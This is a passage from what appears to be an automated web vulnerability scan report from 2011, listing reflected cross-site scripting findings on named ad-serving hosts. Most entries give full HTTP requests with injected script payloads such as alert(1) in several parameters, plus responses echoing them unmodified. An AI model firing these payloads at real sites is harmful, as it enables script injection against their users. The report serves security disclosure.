s;net=q1;u=,q1-48677486_1305033114,11f8f328940989e,none,q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-q1.sports_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h-cm.sports_h;;sz=ecbe8'-alert(1)-'79f52d6e60a;contx=none;dc=w;btg=q1.polit_h;btg=q1.none_h;btg=q1.ent_h;btg=q1.food_h;btg=q1.sports_h;btg=dx.16;btg=dx.23;btg=dx.17;btg=mm.ag1;btg=mm.ak1;btg=mm.am1;btg=mm.aq1;btg=cm.ent_h;btg=cm.music_h;btg=cm.wea
...[SNIP]...

4.52. http://ad.bnmla.com/serve [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.bnmla.com
Path:   /serve

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a45c7"><script>alert(1)</script>ea258321cd6 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve?st=1&pid=563&zid=3621&aid=30790&cid=506a45c7"><script>alert(1)</script>ea258321cd6&ne=1&click=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b03/3/0/%252a/w%253B239983083%253B0-0%253B0%253B28217125%253B4307-300/250%253B40891622/40909409/1%253Bu%253D300x250%7Cbpage%7Cmid_article%7C2012-election%252C@mostpopular%252Crick-santorum%252Celections-2012%252Crick-santorum-for-president%252Csantorum-for-president%252Crick-santorum-2012%252Crick-santorum-south-carolina-straw-poll%252Csantorum-2012%252Csouth-carolina-primary-election%252Csouth-carolina-%253B%257Eokv%253D%253Bfeatured-posts%253D1%253Bpolitics%253D1%253B%253Bentry_id%253D859012%253B2012-election%253D1%253B@mostpopular%253D1%253Brick-santorum%253D1%253Belections-2012%253D1%253Brick-santorum-for-president%253D1%253Bsantorum-for-president%253D1%253Brick-santorum-2012%253D1%253Brick-santorum-south-carolina-straw-poll%253D1%253Bsantorum-2012%253D1%253Bsouth-carolina-primary-election%253D1%253Bsouth-carolina-straw-poll%253D1%253Bsouth-carolina-straw-poll-2011%253D1%253Bsouth-carolina-straw-poll-results%253D1%253Bglobal%253D1%253Bcap_12%253Dn%253Bqcs%253DD%253Bqcs%253DT%253Bqcs%253D2689%253Bqcs%253D2687%253Bqcs%253D2685%253Bqcs%253D1908%253Bqcs%253D1905%253Bqcs%253D1592%253Bqcs%253D683%253Bqcs%253D680%253Bqcs%253D679%253Bqcs%253D678%253Bqcs%253D666%253Bqcs%253D665%253Bqcs%253B%257Eaopt%253D2/1/ff/1%253B%257Esscs%253D%253f HTTP/1.1
Host: ad.bnmla.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ij=eNqrVlAyNjC3NFBSsFKIVjDUUTA0NjA1MDY2MjZXiFWoBQBj4QZq; imp=

Response

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 13:21:59 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8g
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 1208

<html><head></head><body style="background-color:transparent"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b03/3/0/*/w;239983083;0-0;0;28217125;4307-300/250;40891622/40909409/1;u=300
...[SNIP]...
;qcs=D;qcs=T;qcs=2689;qcs=2687;qcs=2685;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=680;qcs=679;qcs=678;qcs=666;qcs=665;qcs;~aopt=2/1/ff/1;~sscs=?http://ad.bnmla.com/click?pid=563&zid=3621&aid=30790&cid=506a45c7"><script>alert(1)</script>ea258321cd6&advid=(null)">
...[SNIP]...

4.53. http://ad.bnmla.com/serve [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.bnmla.com
Path:   /serve

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4bee"><script>alert(1)</script>c24feb1b843 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve?st=1&pid=563&zid=3621&aid=30790&cid=506&ne=1&click=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b03/3/0/%252a/w%253B239983083%253B0-0%253B0%253B28217125%253B4307-300/250%253B40891622/40909409/1%253Bu%253D300x250%7Cbpage%7Cmid_article%7C2012-election%252C@mostpopular%252Crick-santorum%252Celections-2012%252Crick-santorum-for-president%252Csantorum-for-president%252Crick-santorum-2012%252Crick-santorum-south-carolina-straw-poll%252Csantorum-2012%252Csouth-carolina-primary-election%252Csouth-carolina-%253B%257Eokv%253D%253Bfeatured-posts%253D1%253Bpolitics%253D1%253B%253Bentry_id%253D859012%253B2012-election%253D1%253B@mostpopular%253D1%253Brick-santorum%253D1%253Belections-2012%253D1%253Brick-santorum-for-president%253D1%253Bsantorum-for-president%253D1%253Brick-santorum-2012%253D1%253Brick-santorum-south-carolina-straw-poll%253D1%253Bsantorum-2012%253D1%253Bsouth-carolina-primary-election%253D1%253Bsouth-carolina-straw-poll%253D1%253Bsouth-carolina-straw-poll-2011%253D1%253Bsouth-carolina-straw-poll-results%253D1%253Bglobal%253D1%253Bcap_12%253Dn%253Bqcs%253DD%253Bqcs%253DT%253Bqcs%253D2689%253Bqcs%253D2687%253Bqcs%253D2685%253Bqcs%253D1908%253Bqcs%253D1905%253Bqcs%253D1592%253Bqcs%253D683%253Bqcs%253D680%253Bqcs%253D679%253Bqcs%253D678%253Bqcs%253D666%253Bqcs%253D665%253Bqcs%253B%257Eaopt%253D2/1/ff/1%253B%257Esscs%253D%253fd4bee"><script>alert(1)</script>c24feb1b843 HTTP/1.1
Host: ad.bnmla.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ij=eNqrVlAyNjC3NFBSsFKIVjDUUTA0NjA1MDY2MjZXiFWoBQBj4QZq; imp=

Response

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 13:21:59 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8g
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 1204

<html><head></head><body style="background-color:transparent"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b03/3/0/*/w;239983083;0-0;0;28217125;4307-300/250;40891622/40909409/1;u=300
...[SNIP]...
2011=1;south-carolina-straw-poll-results=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2689;qcs=2687;qcs=2685;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=680;qcs=679;qcs=678;qcs=666;qcs=665;qcs;~aopt=2/1/ff/1;~sscs=?d4bee"><script>alert(1)</script>c24feb1b843http://ad.bnmla.com/click?pid=563&zid=3621&aid=30790&cid=506&advid=70">
...[SNIP]...

4.54. http://ad.bnmla.com/serve [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.bnmla.com
Path:   /serve

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b953a'-alert(1)-'0bfbfdc226e was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve?pid=563&cb=456064623&noe=1&zid=3621&click=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b03/3/0/%252a/w%253B239983083%253B0-0%253B0%253B28217125%253B4307-300/250%253B40891622/40909409/1%253Bu%253D300x250%7Cbpage%7Cmid_article%7C2012-election%252C@mostpopular%252Crick-santorum%252Celections-2012%252Crick-santorum-for-president%252Csantorum-for-president%252Crick-santorum-2012%252Crick-santorum-south-carolina-straw-poll%252Csantorum-2012%252Csouth-carolina-primary-election%252Csouth-carolina-%253B%257Eokv%253D%253Bfeatured-posts%253D1%253Bpolitics%253D1%253B%253Bentry_id%253D859012%253B2012-election%253D1%253B@mostpopular%253D1%253Brick-santorum%253D1%253Belections-2012%253D1%253Brick-santorum-for-president%253D1%253Bsantorum-for-president%253D1%253Brick-santorum-2012%253D1%253Brick-santorum-south-carolina-straw-poll%253D1%253Bsantorum-2012%253D1%253Bsouth-carolina-primary-election%253D1%253Bsouth-carolina-straw-poll%253D1%253Bsouth-carolina-straw-poll-2011%253D1%253Bsouth-carolina-straw-poll-results%253D1%253Bglobal%253D1%253Bcap_12%253Dn%253Bqcs%253DD%253Bqcs%253DT%253Bqcs%253D2689%253Bqcs%253D2687%253Bqcs%253D2685%253Bqcs%253D1908%253Bqcs%253D1905%253Bqcs%253D1592%253Bqcs%253D683%253Bqcs%253D680%253Bqcs%253D679%253Bqcs%253D678%253Bqcs%253D666%253Bqcs%253D665%253Bqcs%253B%257Eaopt%253D2/1/ff/1%253B%257Esscs%253D%253fb953a'-alert(1)-'0bfbfdc226e HTTP/1.1
Host: ad.bnmla.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 13:20:44 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8g
Set-Cookie: ij=eNqrVlAysjQ2tlBSsFKIVjDUUTA0NjA1MDY2MzFRiFWoBQBkjQZy;path=/;domain=.bnmla.com;expires=Wednesday, 30-Dec-2036 16:00:00 GMT
Set-Cookie: imp=;path=/;domain=.bnmla.com;expires=Wednesday, 30-Dec-2036 16:00:00 GMT
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2079
Connection: close
Content-Type: text/plain

document.write('<iframe allowtransparency="true" src="http://ad.bnmla.com/serve?st=1&pid=563&zid=3621&aid=29338&cid=506&ne=1&click=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b03/3/0/%252a/w%253B2
...[SNIP]...
qcs%253D1908%253Bqcs%253D1905%253Bqcs%253D1592%253Bqcs%253D683%253Bqcs%253D680%253Bqcs%253D679%253Bqcs%253D678%253Bqcs%253D666%253Bqcs%253D665%253Bqcs%253B%257Eaopt%253D2/1/ff/1%253B%257Esscs%253D%253fb953a'-alert(1)-'0bfbfdc226e" width="300" height="250" frameborder="0" scrolling="no" marginheight="0" marginwidth="0">
...[SNIP]...

4.55. http://ad.bnmla.com/serve [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.bnmla.com
Path:   /serve

Issue detail

The value of the pid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17b38"><script>alert(1)</script>14b232d7784 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve?st=1&pid=56317b38"><script>alert(1)</script>14b232d7784&zid=3621&aid=30790&cid=506&ne=1&click=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b03/3/0/%252a/w%253B239983083%253B0-0%253B0%253B28217125%253B4307-300/250%253B40891622/40909409/1%253Bu%253D300x250%7Cbpage%7Cmid_article%7C2012-election%252C@mostpopular%252Crick-santorum%252Celections-2012%252Crick-santorum-for-president%252Csantorum-for-president%252Crick-santorum-2012%252Crick-santorum-south-carolina-straw-poll%252Csantorum-2012%252Csouth-carolina-primary-election%252Csouth-carolina-%253B%257Eokv%253D%253Bfeatured-posts%253D1%253Bpolitics%253D1%253B%253Bentry_id%253D859012%253B2012-election%253D1%253B@mostpopular%253D1%253Brick-santorum%253D1%253Belections-2012%253D1%253Brick-santorum-for-president%253D1%253Bsantorum-for-president%253D1%253Brick-santorum-2012%253D1%253Brick-santorum-south-carolina-straw-poll%253D1%253Bsantorum-2012%253D1%253Bsouth-carolina-primary-election%253D1%253Bsouth-carolina-straw-poll%253D1%253Bsouth-carolina-straw-poll-2011%253D1%253Bsouth-carolina-straw-poll-results%253D1%253Bglobal%253D1%253Bcap_12%253Dn%253Bqcs%253DD%253Bqcs%253DT%253Bqcs%253D2689%253Bqcs%253D2687%253Bqcs%253D2685%253Bqcs%253D1908%253Bqcs%253D1905%253Bqcs%253D1592%253Bqcs%253D683%253Bqcs%253D680%253Bqcs%253D679%253Bqcs%253D678%253Bqcs%253D666%253Bqcs%253D665%253Bqcs%253B%257Eaopt%253D2/1/ff/1%253B%257Esscs%253D%253f HTTP/1.1
Host: ad.bnmla.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ij=eNqrVlAyNjC3NFBSsFKIVjDUUTA0NjA1MDY2MjZXiFWoBQBj4QZq; imp=

Response

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 13:21:42 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8g
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 1204

<html><head></head><body style="background-color:transparent"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b03/3/0/*/w;239983083;0-0;0;28217125;4307-300/250;40891622/40909409/1;u=300
...[SNIP]...
results=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2689;qcs=2687;qcs=2685;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=680;qcs=679;qcs=678;qcs=666;qcs=665;qcs;~aopt=2/1/ff/1;~sscs=?http://ad.bnmla.com/click?pid=56317b38"><script>alert(1)</script>14b232d7784&zid=3621&aid=30790&cid=506&advid=70">
...[SNIP]...

4.56. http://ad.bnmla.com/serve [zid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.bnmla.com
Path:   /serve

Issue detail

The value of the zid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c838b"><script>alert(1)</script>7cfd2f0fb1f was submitted in the zid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve?st=1&pid=563&zid=3621c838b"><script>alert(1)</script>7cfd2f0fb1f&aid=30790&cid=506&ne=1&click=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b03/3/0/%252a/w%253B239983083%253B0-0%253B0%253B28217125%253B4307-300/250%253B40891622/40909409/1%253Bu%253D300x250%7Cbpage%7Cmid_article%7C2012-election%252C@mostpopular%252Crick-santorum%252Celections-2012%252Crick-santorum-for-president%252Csantorum-for-president%252Crick-santorum-2012%252Crick-santorum-south-carolina-straw-poll%252Csantorum-2012%252Csouth-carolina-primary-election%252Csouth-carolina-%253B%257Eokv%253D%253Bfeatured-posts%253D1%253Bpolitics%253D1%253B%253Bentry_id%253D859012%253B2012-election%253D1%253B@mostpopular%253D1%253Brick-santorum%253D1%253Belections-2012%253D1%253Brick-santorum-for-president%253D1%253Bsantorum-for-president%253D1%253Brick-santorum-2012%253D1%253Brick-santorum-south-carolina-straw-poll%253D1%253Bsantorum-2012%253D1%253Bsouth-carolina-primary-election%253D1%253Bsouth-carolina-straw-poll%253D1%253Bsouth-carolina-straw-poll-2011%253D1%253Bsouth-carolina-straw-poll-results%253D1%253Bglobal%253D1%253Bcap_12%253Dn%253Bqcs%253DD%253Bqcs%253DT%253Bqcs%253D2689%253Bqcs%253D2687%253Bqcs%253D2685%253Bqcs%253D1908%253Bqcs%253D1905%253Bqcs%253D1592%253Bqcs%253D683%253Bqcs%253D680%253Bqcs%253D679%253Bqcs%253D678%253Bqcs%253D666%253Bqcs%253D665%253Bqcs%253B%257Eaopt%253D2/1/ff/1%253B%257Esscs%253D%253f HTTP/1.1
Host: ad.bnmla.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ij=eNqrVlAyNjC3NFBSsFKIVjDUUTA0NjA1MDY2MjZXiFWoBQBj4QZq; imp=

Response

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 13:21:42 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8g
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 1204

<html><head></head><body style="background-color:transparent"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b03/3/0/*/w;239983083;0-0;0;28217125;4307-300/250;40891622/40909409/1;u=300
...[SNIP]...
;global=1;cap_12=n;qcs=D;qcs=T;qcs=2689;qcs=2687;qcs=2685;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=680;qcs=679;qcs=678;qcs=666;qcs=665;qcs;~aopt=2/1/ff/1;~sscs=?http://ad.bnmla.com/click?pid=563&zid=3621c838b"><script>alert(1)</script>7cfd2f0fb1f&aid=30790&cid=506&advid=70">
...[SNIP]...

4.57. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9c66"-alert(1)-"53d49cc6164 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=Bh3PBaEfJTb6MKtaP6Abtv72DDrGBmIwC-YGx3B7AjbcBoJ6nARABGAEgi5nvFDgAUMTE0OECYMmGhYmIpIQQoAHXsf3cA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBZ2h0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB&num=1&sig=AGiWqtzhPsbh4zDX8jtqjhycbU983h2Dvg&client=ca-pub-5220960495122375&adurl=d9c66"-alert(1)-"53d49cc6164 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.geek.com/articles/geek-pick/63398--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E7861d958a55/
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 38065
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 10 May 2011 14:20:18 GMT
Expires: Tue, 10 May 2011 14:20:18 GMT

<SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayM
...[SNIP]...
NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB&num=1&sig=AGiWqtzhPsbh4zDX8jtqjhycbU983h2Dvg&client=ca-pub-5220960495122375&adurl=d9c66"-alert(1)-"53d49cc6164";
this.clickN = "";
this.type = type;
this.uniqueId = plcrInfo_1302134510253.uniqueId;
this.thirdPartyImpUrl = "";
this.
...[SNIP]...

4.58. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 136c0"-alert(1)-"94a183be85b was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=Bh3PBaEfJTb6MKtaP6Abtv72DDrGBmIwC-YGx3B7AjbcBoJ6nARABGAEgi5nvFDgAUMTE0OECYMmGhYmIpIQQoAHXsf3cA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBZ2h0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB136c0"-alert(1)-"94a183be85b&num=1&sig=AGiWqtzhPsbh4zDX8jtqjhycbU983h2Dvg&client=ca-pub-5220960495122375&adurl=;ord=628818073? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.geek.com/articles/geek-pick/63398--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E7861d958a55/
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 10 May 2011 14:16:32 GMT
Content-Length: 7143

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Mar 17 11:27:33 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
5MF9hc8gBCdoBZ2h0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB136c0"-alert(1)-"94a183be85b&num=1&sig=AGiWqtzhPsbh4zDX8jtqjhycbU983h2Dvg&client=ca-pub-5220960495122375&adurl=http%3a%2f%2fad.doubleclick.net/2493053/redirect_nexuss_gdn.html");
var fscUrl = url;
var fscUrlClickTagFound = fals
...[SNIP]...

4.59. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a81e"-alert(1)-"71eef48a17a was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=Bh3PBaEfJTb6MKtaP6Abtv72DDrGBmIwC-YGx3B7AjbcBoJ6nARABGAEgi5nvFDgAUMTE0OECYMmGhYmIpIQQoAHXsf3cA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBZ2h0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB&num=1&sig=AGiWqtzhPsbh4zDX8jtqjhycbU983h2Dvg&client=ca-pub-52209604951223753a81e"-alert(1)-"71eef48a17a&adurl=;ord=628818073? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.geek.com/articles/geek-pick/63398--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E7861d958a55/
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 10 May 2011 14:19:18 GMT
Content-Length: 7143

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Mar 17 11:27:33 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
lM0UlM0NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB&num=1&sig=AGiWqtzhPsbh4zDX8jtqjhycbU983h2Dvg&client=ca-pub-52209604951223753a81e"-alert(1)-"71eef48a17a&adurl=http%3a%2f%2fad.doubleclick.net/2493053/redirect_nexuss_gdn.html");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
...[SNIP]...

4.60. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

